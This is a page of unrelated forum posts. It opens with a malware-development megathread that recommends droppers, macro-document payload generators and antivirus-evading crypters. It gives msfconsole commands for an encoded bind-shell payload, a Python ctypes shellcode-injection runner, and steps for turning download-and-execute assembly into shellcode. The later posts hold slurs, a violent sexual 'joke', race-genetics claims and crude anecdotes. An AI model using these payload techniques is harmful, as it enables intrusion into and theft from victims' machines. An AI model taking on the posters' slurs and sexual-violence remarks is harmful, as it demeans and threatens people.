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Posts That Were Thanked by Grimace

  1. Sophie Pedophile Tech Support
    4. Deployment & Encoding

    Any malware dev will tell you that getting your payload to he target undetected is perhaps the most important part in a malware campaign. Or any engagement in which malware might be leveraged to some end. Be it surveillance or stealing banking info for instance.

    For that reason i have decided to include some resources here that may be useful in that regard.

    First off under the category 'deployment' the Dr0p1t-framework can be used to create a stealthy malware dropper. A dropper is a piece of malware that downloads other kinds of malware to the target's machine.

    Secondly VBad is a fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It's the type of tool you'd use to spread your malware via malicious MS Office documents. The VBA script gets embedded in a Word document in example and when the Macro is activated it downloads the payload of your choice to the victim's machine and executes it.

    ThirdlypeCloakCapstone is a crypter. This piece of software is used in order to encode your payload in order to defeat AV solutions. It's a fork of PeCloak originally written by someone at Security Sift. You can read about the original project and how it operates by clicking here.

    5. Miscellaneous

    If you're interested in how Malware behaves in the wild, you might want to consider setting up a honeypot. It so happens there's one that is easily deployable, called HoneyPy. Check out the project's repo below.

    The HoneyPy honeypots send their data to HoneyDB as well. Which keeps track of all the activity that takes place in the honeypot environments. It has a data visualization service as well. Check it out below.

    For convenience sake i wrote a command line interface for HoneyDB so that you can keep track of all the activity from the comfort of your terminal. Download it directly from my repo at Github Or simply clone it.

    git clone


    Please feel free to post all you malware related resources in this thread. Be it books, tools, code snippets, custom malware you wrote. Or techniques you like to employ. I am looking forward to reading your contributions!

    Post last edited by Sophie at 2017-12-11T08:34:06.882553+00:00
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Sophie Pedophile Tech Support
    Sup nigs. This is a cross post i made on a security forum and i thought you guys might enjoy it as well.

    I would encourage anyone that has any interesting information to add to do so. It wouldn't be a mega thread if we wouldn't add as much resources as possible.

    Table of Contents
    • 1. Analysis and RevEng Resources
    • 2. Samples, Open Source and Otherwise
    • 3. MalDev Resources, Technical & Techniques
    • 4. Deployment & Encoding
    • 5. Miscellaneous

    1. Analysis and Reverse Engineering Resources

    Personally i focus more on the development side of things but i've come across a few resources that i think will be useful to anyone trying to get more into the analysis side. Of course first and foremost; Practical Malware Analysis.Is the aspiring analyst's bible. It is complete with exercises and examples. Best practices and imparts solid foundational knowledge. It is in my opinion an excellent starting point.

    These presentation slides that i have found offer a quick overview of some of the tools, techniques and procedures that you will need to know before getting into any sort of work with regards to malware analysis. It discusses some points like risk reduction by implementing platform diversity. Such as using different operating systems in VM or otherwise to do your technical detective work. It goes into some VM basics and goes into how to create a safe environment among other things.

    Basically it's a summary of a lot of the important things to take into consideration. It's useful as a reference guide as well together with the Practical Malware Analysis ebook.

    When it comes to virtualization i like VMware a lot. They offer a free version of their product called VMware Player. That in my experience is pretty useful for testing malware on different platforms. The paid version called VMware Workstation offers more features that might be useful to you if you can afford to pay the 200$ price tag.

    I like to use Windows in VM on occasion to test certain types of malware out. Fortunately there's free images of the OS available from Microsoft's own website directly. Check out the available versions by clicking here.

    If you would like to perform some reverse engineering on your virtual Windows machine check out OllyDBG. I particularly enjoyed playing around with this debugger on Windows. A quick start guide can be found by clicking here.

    From a platform diversity standpoint you might want to do some of these tasks on Linux as well. In that case, you may be interested in REMnux. Which is a Linux distro that is built with the needs of the reverse engineer in mind, it comes pre-installed with a bunch of tools. Check out the distro at the link below.

    A quick tool overview can be found at the link here;

    To the best of my knowledge it doesn't come with a debugger that has a GUI. There are however Linux debuggers that come with graphical user interfaces. For instance, i like EDB-Debugger, it's my go-to Linux debugger. If i recall correctly it is based on OllyDBG. Below i have posted a shell script that automates the installation of EDB-Debuger if you're interested.


    # install dependencies
    sudo apt-get install \
    cmake \
    build-essential \
    libboost-dev \
    libqt5xmlpatterns5-dev \
    qtbase5-dev \
    qt5-default \
    libqt5svg5-dev \
    libgraphviz-dev \

    # build and run edb
    git clone --recursive
    cd edb-debugger
    mkdir build
    cd build
    cmake ..

    # Comment this last one out if you don't want to run EDB after installation

    What this shell script does is install all the dependencies you need, after which it builds the debugger from source and starts it up for you. If it's run from your home directory, the EDB directory will be in your /home/ as well. In that case you can use an alias to start it from the command line by typing the following into your terminal.

    alias edb="cd ~/edb-debugger/build && ./edb"

    Now when you type `edb` it will start up for you. Alternatively you could make a symbolic link as well. But i find a simple alias to be just as effective in this case.

    To conclude this category make sure you bookmark the following repo on github.

    As the name might suggest the repo contains a curated list of awesome malware analysis tools and resources. Definitely worth checking out!

    2. Samples, Open Source and Otherwise

    There are a number of places where one can go and find some interesting samples to play around with. I'll start off with some resources that can be found on Github.

    I have a repo forked on my Github that contains a list of Rootkits that can be downloaded from Github and a couple of other places. Check it out below.

    Furthermore i have compiled a small list of sites that offer malware samples as well.

    Alternatively i recently came across a project on Github that works by automatically searching a number of sites for malware samples. It's a bit outdated and i personally haven't used it but i thought it deserved a mention regardless so here's the tool.

    What's more, i am currently in the possession of about 50 malicious files and programs. Among which Trojans, Keyloggers, Worms and more. If you'd like to see if my collection might have something interesting for you, check out this paste where i posted a rough list of what i currently have. Send me a PM if you'd like to receive one or more of my samples.

    3. MalDev, Resources, Technical & Techniques.

    I'll start this section off by posting a couple of books. Since we'll be talking about malware development i decided to compile some resources for this thread that have to do with Assembly, Kernel Exploitation, Shellcode and since I am a Python programmer i will also be adding some e-books that deal with MalDev in Python.

    Kernel Exploitation: Attacking The Core. Deals with everything from shell code to CPU architecture, general kernel auditing and abusing Linux Privilege Models. Techniques that you might want to incorporate into your malware such as rootkits.

    Next up i have a collection of ebooks that delve into the world of Assembly. I had considered putting this under the Reverse Engineering section but i reckon that being good at Assembly is a plus for the analyst and developer as well. I've recently been trying to get more into it for that reason. Now, admittedly i don't have a lot of experience with it but i think it would be a good addition to this thread regardless. The books in question are as follows:

    Intel32-2-Instruction Set ReferenceA.pdf
    Intel32-2-Instruction Set ReferenceB.pdf
    Non-Executable Stack ARM Exploitation(def18).pdf
    On the Effectiveness of Address-Space Randomization.pdf
    The Art Of Assembly Language.pdf
    Understanding the Low Fragmentation Heap-BH10.pdf

    I've uploaded them to which will keep them up for 90 days. So get them while you can if you're interested, by clicking here. However these books are also available this hidden service http://ytxmrc3pcbv5464e.onion/files/Infosec/ under the Security/Hacking zipfile.

    I also managed to find an introductory guide to win32 shell code.

    What i like about shell code and custom ASM that is converted to shell code is that it can be employed by Python. More specifically with the `ctypes` module and code injection techniques. A while ago i made a thread about this on the forum which i later adapted into a Medium article. To illustrate how this can be accomplished i will include some of the info i wrote in the article in this thread as well.

    Example; Custom ASM -> Shell Code -> Code Injection with Python

    If you have a sample of ASM that performs a specific operation such as spawning an OS shell or downloading and executing a binary from a remote host you might want to employ this functionality in Python to create a more powerful piece of software/malware.

    In order to do so however we can’t just copy/paste ASM directly into a Python script. Instead, Python reads the machine code in as a bytearray of shellcode where the binary data is represented by a hex value where the \x represents the offset.(Lanny's Note: The "\x" isn't really an "offset", it's just an escape code that signals the following two bytes in source are the hexadecimal representation of the next byte of the given string. The offset of a given byte is signaled its position in the literal expression.) If you’ve worked with Metasploit before or have experience with shell code in any other capacity you might recognize that this looks like the following.


    As alluded to, this is shell code generated by Metasploit, what this shell code does when executed, is open port 8899 on the target Windows machine and listens for incoming connections over TCP. Once a connection has been established it spawns an OS shell. You can reproduce it by entering the following commands into your instance of msfconsole.

    use payload/windows/shell/bind_tcp

    set LPORT 8899

    generate -b '\x00' -e x86/shikata_ga_nai -f /tmp/payload.txt

    This will save the generated shell code to a file called 'payload.txt' in your /tmp/ directory. The -b flag omits the use of a bad character(The null byte) and the -e flag sets the encoding scheme for the payload to 'shikata_ga_nai' on x86 architecture. More on generating payloads here.

    We can have this shellcode execute on our target machine by using the CreateRemoteThread method. Python's 'ctypes' library is excellent for this.

    import os
    import ctypes

    def execute():
    # Bind shell
    shellcode = bytearray(

    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),

    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)


    ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),


    if __name__ == "__main__":

    Executing the script will result in the shell code we have defined being run in memory. More on code injection here

    Say you have some custom ASM that you would like to employ in a similar manner. No problem, it so happens there’s a Linux utility to assist us with exactly that.

    In example, here’s some encoded ASM that I generated with an unrelated script. For the sake of brevity I will not post the entire program but a sample so that you get a feeling for what we’re converting here.

    xor eax,eax
    push eax
    push 0x22657841
    pop eax
    shr eax,0x08
    push eax
    mov eax,0x1d4f211f
    mov ebx,0x78614473
    xor eax,ebx
    push eax
    mov eax,0x3c010e70
    mov ebx,0x5567524a
    xor eax,ebx
    push eax
    mov eax,0x3c481145
    mov ebx,0x78736c6c
    xor eax,ebx
    push eax
    mov eax,0x4a341511
    mov ebx,0x6d516d74

    What the complete program does is download a binary from a remote host and run it. To convert this to a bytearray of shellcode we will use the utility called objdump and a regular expression using grep, after which the shellcode will be printed to the terminal. The commands for which are structured as follows.

    objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

    Where you replace “PROGRAM” with the binary ASM file and if all went well, the proper shellcode will be printed to the terminal in the following format.


    All that's left is to add your newly formatted code as an argument to the bytearray method in the Python script from before like so.

    def execute():
    shellcode = bytearray(#---SHELLCODE GOES HERE---#)

    If you're interested in learning how to build python based Malware check out these books: Grey Hat python and Black Hat Python. they cover a lot of general security oriented subjects but especially Black hat Python has a focus on malicious software in the latter half of the book.

    If you're interested in a couple more examples of Python based Malware you can check out, my friend Sithis' Crypter Ransomware Project or perhaps one of the best Python based malwares out there in my opinion, called PuPy

    It might also be interesting to note that fairly recently a backdoor development framework was released on github by the name of Covertutils. It works a lot like msfvenom and allows you to easily generate backdoors. You can check it out here.
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. Originally posted by Grimace I was young and dumb (and full of cum, too).

    The following users say it would be alright if the author of this post didn't die in a fire!
  4. Lanny is Satan Yung Blood
    Go to tinychat lol.
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  5. Idk how yall do this 9-5 shit *quickly shuffles thru a stack of $37 in ones*
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  6. mmQ Lisa Turtle
    Im gonna look at you however the fuck I want and I happen to also rip your clothes off and forcefuck you it's just a compliment you stupid bitch!
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  7. aldra JIDF Controlled Opposition
    Originally posted by 哈哈你看不懂中文 What do you mean by assimilate into a host society? As far as what?

    I'm mostly talking about immigration and the problems with the concept of 'multiculturalism'.

    People who migrate into a host society should be expected to make an effort to integrate themselves; to adopt the host culture to a degree and not form enclaves that undermine the 'social fabric'.

    If you're after a specific example, my father's family is Vietnamese and they migrated here to Australia after the Vietnam War. My father, aunts, uncles etc. were forced to integrate through school, but there were many people in that community (most specifically those who were older) who abjectly refused to learn or speak English and would interact only with close family groups - any time they needed to interact with someone outside the circle they'd send the kids.

    Things aren't nearly as bad as they used to be, but south-east Asian and Arabic (Lebanese mostly) enclaves caused massive issues in western Sydney in the 90s for the very reason that they didn't understand or respect the host culture. Local groups ranged from indifferent to hostile to police, corruption in local government was an epidemic, there were almost parallel legal systems in operation... Things like that.

    There are undeniable genetic differences between human races. You'd have to be downright retarded to deny that. That's some SJW shit.

    and yet videos discussing the matter get delisted on youtube...
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  8. aldra JIDF Controlled Opposition

    I'm not sure what this is but it kind of looks like the outline of a COVETOUS jedi
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  9. bling bling Dark Matter
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  10. NARCassist gollums fat coach
    any music is better than mainstream music today.

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  11. NARCassist gollums fat coach
    Originally posted by Grimace Everyone likes to offer cliche answers like "go outside" or "just talk to some girl you meet", but this is absolutely retarded advise.

    The fact is, in 2017, I don't know how to meet women! When I was coming of age and meeting/dating women, we all met through either a mutual friend, a bar, a pool (billiards) hall, skating rink, etc. We met face to face. We spoke in person.

    Now, it seems the most popular way to meet someone is to use some sort of online service. I not only find that creepy, but also sad. "BUT GRIMACE! I FOUND THE LOVE OF MY LIFE THROUGH AN ONLINE SITE AND TIMES ARE CHANGING! YOU SHOULD BE MORE PROGRESSIVE AND STOP LIVING IN THE PAST AND ACCEPT PROGRESSIVE WAYS!" - maybe so. There are certain things that I think shouldn't become online-based. Like dating.

    You should generically meet a girl on your own and generically foster a relationship with her. My sister used an online dating site and she is happily married now for almost 6 years. It makes me want to see statistical data on how often those types of relationships last. Anyway, I am rambling…

    In 2017, I have no fucking idea how to meet women. If I wasn't already married, I would be lost. I guess I would be another fucking loser on another one of these desperate fucking dating websites, making a desperate account, and essentially stalking women.

    i agree with this. the biggest part of hooking up with a chick irl is the flirting and how you gel with her. that's not just what you say, its how you say it, its reading each others body language, its the eyes and those certain looks you give and receive each other and more. you just can't get any of that on tinder from a few still images and a profile that nobody really knows what to say on coz anything you do say about yourself just comes over as pretentious as fuck. add to that the fact that most people assume everyone's profile is either fake pix of someone else, photoshopped or completely faked profile altogether like 14/f/cali or summing. its a fucking monstrous way of meeting chicks imo.

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    The following users say it would be alright if the author of this post didn't die in a fire!
  13. Originally posted by Kolokol-1 Yes

    and then every1 hates me and thinks i'm a jerk for being a dick all the time

    i'm the only one who's real. i'm the only one who respects you all.

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  14. The following users say it would be alright if the author of this post didn't die in a fire!
  15. G African Astronaut
    Once in county jail I gather someone was too bashful to defecate in the cell with their mates, so they conveniently left a huge coil in the day room showers. You've never seen a chiseled from stone, fearless convict cower away in utter fear as fast as when he faced an unexpected visit from the fecal fairy.

    It was funny as hell seeing 2 older ebony gents go into rants about "fucking weirdos shitting in the shower" & that this was "cruel & unusual punishment" as they donned make-shift Hazmat suits w/checker board chest shields (held around the neck with toilet paper rope) & surgical masks of old commissary bags. The gloves were fashioned out of zip lock bags that the initial hygiene pack was handed out in & made the tossing of cleaning chemicals from feet away an ardous task. It took 2 wily vets over an hour to do so, as the bewildered C.O. just stood there scratching his head. I remember one of the clean up guys Mr. Willie wandered around for days stroking his chin mumbling aloud "who tha fuck shits in a shower ?!". Mind you there was only 2 stalls for roughly 50 heads & that one was avoided like the plague for mo.'s by the heads in the "know".

    Weeks later it was determined that a guy in D-17 was the culprit who was referred from then on as "Filthy Mac Nasty" & "Shitfrey Dahmer". He was ostracised from the group,left out of the spade tournaments & the related comradery(discussing the buttocks of the musical artists on BET,whose the best rapper debates, etc.),,,ah the memories

    I defecate in a manner I termed "drago technique" it is the norm for many original people. I used to call it the "gargoyle" but I have elevated the game to have perfect weight distribution as to not break any more toilet seats. My non-perfected technique has been responsible for many a broken toilet seat that has cost me 2 concubines & a 425$ damage charge from a Marriot. It promotes better bowel evacuation & keeps the knees limber.

    As a child my family travelled the globe, I remember fondly while in India during the 70's, another child stumbled upon me in "drago" formation, well back then it was "gargoyle"(coined due to the familiarity of looking as if perched on a roof top like the afore named statues). He was perplexed,ran & told his father who was some kind of village holy man, who then assured me & his seed that it was completely normal, which I already knew lol. To this day I ponder if Sanu picked up the drago technique,,,

    I expect many people are grumpy & @ risk of colon rot/cancer just by simply not shitting properly.

    Post last edited by G at 2017-11-19T09:33:45.331824+00:00
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  16. mashlehash victim of incest [my perspicuously dependant flavourlessness]
    Originally posted by mmQ Did you know that there's an omitted verse before that where Jesus learns of your future conception.

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  17. mmQ Lisa Turtle
    I don't see why that wouldn't work, but if I was the one buying it under the same circumstances I'm sure it would perform as described for a day or two before spontaneously shattering and melting, starting my apt complex on fire in the middle of night and killing everyone.

    Just make sure it has the necessary port, and have the owner prove to you that it works like they say it does.
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  18. -SpectraL coward [the spuriously bluish-lilac bushman]
    Bullshit. Anyone could setup and generate the exact same deal as the '80's/'90's BBS scene right here, if it weren't for completely shitty, power-abusing, close-minded administrators, playing with their little mod buttons and getting butt-hurt at every turn, mindless kidiots, with their bleeding-heart liberal lapdogs full of excuses in tow, and, of course, your unimaginative/uninspiring retards chiming in. You all have a defeatist attitude; that's the only real and genuine problem/hindrance in this. And that's been the problem all along. Truth hurts, but fuck you and the horse you rode in on, there it is.

    You're bang on, Dizzy.
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  19. NARCassist gollums fat coach
    or just piss in the sink like normal people

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  20. AngryOnion Big Wig [the nightly self-effacing broadsheet]
    Will this work?
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